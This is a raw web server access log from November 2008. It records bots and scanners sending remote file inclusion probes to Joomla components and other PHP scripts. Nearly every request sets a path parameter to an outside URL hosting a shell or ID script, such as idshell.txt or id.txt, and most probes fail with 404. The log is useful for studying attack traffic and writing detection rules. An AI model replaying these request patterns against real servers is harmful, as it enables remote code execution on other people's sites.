61.50.221.108 - - [02/Nov/2008:18:01:43 -0600] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:01:43 -0600] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:02:54 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:02:54 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
98.210.195.32 - - [02/Nov/2008:18:03:27 -0600] "GET /logs/access_log.1206230400/errors.php?error=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
98.210.195.32 - - [02/Nov/2008:18:03:27 -0600] "GET /logs/errors.php?error=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
98.210.195.32 - - [02/Nov/2008:18:03:27 -0600] "GET /errors.php?error=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
98.210.195.32 - - [02/Nov/2008:18:03:36 -0600] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 365 "-""libwww-perl/5.808"
98.210.195.32 - - [02/Nov/2008:18:03:36 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
98.210.195.32 - - [02/Nov/2008:18:03:39 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
72.67.206.114 - - [02/Nov/2008:18:04:20 -0600] "GET /protection.php?action=logout&siteurl=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.67.206.114 - - [02/Nov/2008:18:04:21 -0600] "GET /logs/protection.php?action=logout&siteurl=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
61.50.221.108 - - [02/Nov/2008:18:05:14 -0600] "GET /logs/modifyform.html?code=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:05:15 -0600] "GET /modifyform.html?code=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:06:34 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:06:34 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
62.87.154.41 - - [02/Nov/2008:18:07:25 -0600] "GET /logs/access_log.1216425600//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
62.87.154.41 - - [02/Nov/2008:18:07:31 -0600] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.87.154.41 - - [02/Nov/2008:18:07:36 -0600] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.87.154.41 - - [02/Nov/2008:18:09:36 -0600] "GET /logs/access_log.1215302400//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
207.58.140.237 - - [02/Nov/2008:18:10:44 -0600] "GET /logs/db.php?path_local=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
207.58.140.237 - - [02/Nov/2008:18:10:44 -0600] "GET /db.php?path_local=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.811"
210.86.238.70 - - [02/Nov/2008:18:11:25 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
210.86.238.70 - - [02/Nov/2008:18:11:26 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
208.75.224.226 - - [02/Nov/2008:18:14:15 -0600] "GET /logs/access_log.1205366400///vwar/backup/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
208.75.224.226 - - [02/Nov/2008:18:14:15 -0600] "GET ///vwar/backup/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
208.75.224.226 - - [02/Nov/2008:18:14:15 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
87.230.0.157 - - [02/Nov/2008:18:14:35 -0600] "GET /logs/db.php?path_local=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.76"
87.230.0.157 - - [02/Nov/2008:18:14:35 -0600] "GET /db.php?path_local=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 290 "-""libwww-perl/5.76"
65.55.208.122 - - [02/Nov/2008:18:22:08 -0600] "GET /logs/access_log.1161475200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
212.92.23.117 - - [02/Nov/2008:18:22:50 -0600] "GET /?sourcedir=http://www.tabernus.com/company/l333tbi1tX.txt???? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
212.92.23.117 - - [02/Nov/2008:18:22:51 -0600] "GET /logs/?sourcedir=http://www.tabernus.com/company/l333tbi1tX.txt???? HTTP/1.1" 200 105501 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
208.75.224.226 - - [02/Nov/2008:18:23:01 -0600] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
200.21.133.252 - - [02/Nov/2008:18:23:30 -0600] "GET /logs/includes/lang/language.php?path_to_root=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.21.133.252 - - [02/Nov/2008:18:23:30 -0600] "GET /includes/lang/language.php?path_to_root=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
208.75.224.226 - - [02/Nov/2008:18:24:06 -0600] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
208.75.224.226 - - [02/Nov/2008:18:24:06 -0600] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
208.75.224.226 - - [02/Nov/2008:18:24:08 -0600] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
208.75.224.226 - - [02/Nov/2008:18:24:08 -0600] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
198.65.247.14 - - [02/Nov/2008:18:27:40 -0600] "GET /logs/access_log.1205366400//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 340 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
198.65.247.14 - - [02/Nov/2008:18:27:40 -0600] "GET //modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
198.65.247.14 - - [02/Nov/2008:18:27:40 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
198.65.247.14 - - [02/Nov/2008:18:27:56 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
198.65.247.14 - - [02/Nov/2008:18:27:56 -0600] "GET //modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
198.65.247.14 - - [02/Nov/2008:18:27:56 -0600] "GET /logs/access_log.1205366400//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 340 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
198.65.247.14 - - [02/Nov/2008:18:28:23 -0600] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 340 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
198.65.247.14 - - [02/Nov/2008:18:28:46 -0600] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 340 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
61.109.245.113 - - [02/Nov/2008:18:29:39 -0600] "GET /logs//components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
61.109.245.113 - - [02/Nov/2008:18:29:40 -0600] "GET //components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
198.65.247.14 - - [02/Nov/2008:18:32:53 -0600] "GET /logs/access_log.1218067200//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 340 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
198.65.247.14 - - [02/Nov/2008:18:33:00 -0600] "GET /logs/access_log.1218067200//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 340 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
198.65.247.14 - - [02/Nov/2008:18:33:42 -0600] "GET /logs/access_log.1210032000//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 340 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
198.65.247.14 - - [02/Nov/2008:18:33:42 -0600] "GET /logs/access_log.1210032000//modules/xfsection/modify.php?dir_module=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 340 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
77.104.245.71 - - [02/Nov/2008:18:35:16 -0600] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shefaa.org/images/id?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
77.104.245.71 - - [02/Nov/2008:18:35:16 -0600] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shefaa.org/images/id?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.104.245.71 - - [02/Nov/2008:18:35:19 -0600] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shefaa.org/images/id?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
77.104.245.71 - - [02/Nov/2008:18:35:19 -0600] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shefaa.org/images/id?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
208.75.224.226 - - [02/Nov/2008:18:40:38 -0600] "GET /logs/access_log.1212883200/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
208.75.224.226 - - [02/Nov/2008:18:40:39 -0600] "GET /errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
208.75.224.226 - - [02/Nov/2008:18:40:39 -0600] "GET /logs/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
66.40.52.28 - - [02/Nov/2008:18:44:18 -0600] "GET /logs/phphtml.php?htmlclass_path=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.40.52.28 - - [02/Nov/2008:18:44:19 -0600] "GET /phphtml.php?htmlclass_path=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.40.52.28 - - [02/Nov/2008:18:44:20 -0600] "GET /logs/phphtml.php?htmlclass_path=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.40.52.28 - - [02/Nov/2008:18:44:21 -0600] "GET /phphtml.php?htmlclass_path=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
61.109.245.113 - - [02/Nov/2008:18:45:01 -0600] "GET /logs/access_log.1216425600//components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
61.109.245.113 - - [02/Nov/2008:18:45:02 -0600] "GET //components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
61.109.245.113 - - [02/Nov/2008:18:45:02 -0600] "GET /logs//components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
203.146.26.91 - - [02/Nov/2008:18:48:57 -0600] "GET //bbs/skin/zero_vote/error.php?dir=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
62.87.154.41 - - [02/Nov/2008:18:49:37 -0600] "GET /logs//components/com_flyspray/startdown.php?file=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
62.87.154.41 - - [02/Nov/2008:18:49:39 -0600] "GET //components/com_flyspray/startdown.php?file=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
61.50.221.108 - - [02/Nov/2008:18:51:12 -0600] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:51:13 -0600] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:51:16 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:51:17 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:51:17 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:51:18 -0600] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:52:56 -0600] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:52:59 -0600] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
66.40.52.28 - - [02/Nov/2008:18:53:00 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.40.52.28 - - [02/Nov/2008:18:53:00 -0600] "GET //include/admin.lib.inc.php?site_path=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.40.52.28 - - [02/Nov/2008:18:53:01 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.40.52.28 - - [02/Nov/2008:18:53:02 -0600] "GET //include/admin.lib.inc.php?site_path=http://quiroga.presencia.net/osy2.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
61.50.221.108 - - [02/Nov/2008:18:53:51 -0600] "GET /logs/access_log.1216425600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 377 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:53:51 -0600] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
61.50.221.108 - - [02/Nov/2008:18:53:52 -0600] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
219.85.63.226 - - [02/Nov/2008:18:54:38 -0600] "GET /logs/access_log.1218931200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
219.85.63.226 - - [02/Nov/2008:18:54:58 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [02/Nov/2008:18:54:58 -0600] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [02/Nov/2008:18:54:58 -0600] "GET /logs/access_log.1215734400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [02/Nov/2008:18:54:58 -0600] "GET /logs/access_log.1218931200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.85.63.226 - - [02/Nov/2008:18:55:08 -0600] "GET /logs/index.php?openfile=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
219.85.63.226 - - [02/Nov/2008:18:55:09 -0600] "GET /index.php?openfile=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
219.85.63.226 - - [02/Nov/2008:18:56:37 -0600] "GET /logs/access_log.1215734400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
219.85.63.226 - - [02/Nov/2008:18:56:39 -0600] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
219.85.63.226 - - [02/Nov/2008:18:56:39 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
219.85.63.226 - - [02/Nov/2008:18:56:48 -0600] "GET /logs/access_log.1218931200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
85.214.61.186 - - [02/Nov/2008:18:58:22 -0600] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
85.214.61.186 - - [02/Nov/2008:18:58:23 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
85.214.61.186 - - [02/Nov/2008:18:58:23 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
210.86.238.70 - - [02/Nov/2008:19:00:12 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
219.85.63.226 - - [02/Nov/2008:19:01:51 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
219.85.63.226 - - [02/Nov/2008:19:01:51 -0600] "GET /logs/access_log.1211414400//modules/vwar/admin/admin.php?vwar_root=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
219.85.63.226 - - [02/Nov/2008:19:01:51 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
61.109.245.113 - - [02/Nov/2008:19:02:03 -0600] "GET /logs//components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
61.109.245.113 - - [02/Nov/2008:19:02:04 -0600] "GET //components/com_flyspray/startdown.php?file=http://mail.jbdi.or.kr/jbdi_intra/bbs/data/safe1.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
72.30.79.125 - - [02/Nov/2008:19:02:15 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.125 - - [02/Nov/2008:19:02:15 -0600] "GET /artwork/tombio.htm HTTP/1.0" 404 290 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.146.26.91 - - [02/Nov/2008:19:03:59 -0600] "GET /logs/access_log.1202428800//bbs/skin/zero_vote/error.php?dir=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
203.146.26.91 - - [02/Nov/2008:19:03:59 -0600] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
203.146.26.91 - - [02/Nov/2008:19:04:38 -0600] "GET /logs/access_log.1208044800//bbs/skin/zero_vote/error.php?dir=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
62.87.154.41 - - [02/Nov/2008:19:05:06 -0600] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.87.154.41 - - [02/Nov/2008:19:05:06 -0600] "GET //e404.php?DOCUMENT_ROOT=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
211.202.2.220 - - [02/Nov/2008:19:06:58 -0600] "GET /logs/access_log.1212883200/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.202.2.220 - - [02/Nov/2008:19:06:59 -0600] "GET /errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.202.2.220 - - [02/Nov/2008:19:06:59 -0600] "GET /logs/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
94.23.0.147 - - [02/Nov/2008:19:08:39 -0600] "GET /logs/encapscms_PATH/core/core.php?root=http://clusty.com/search??? HTTP/1.1" 404 317 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
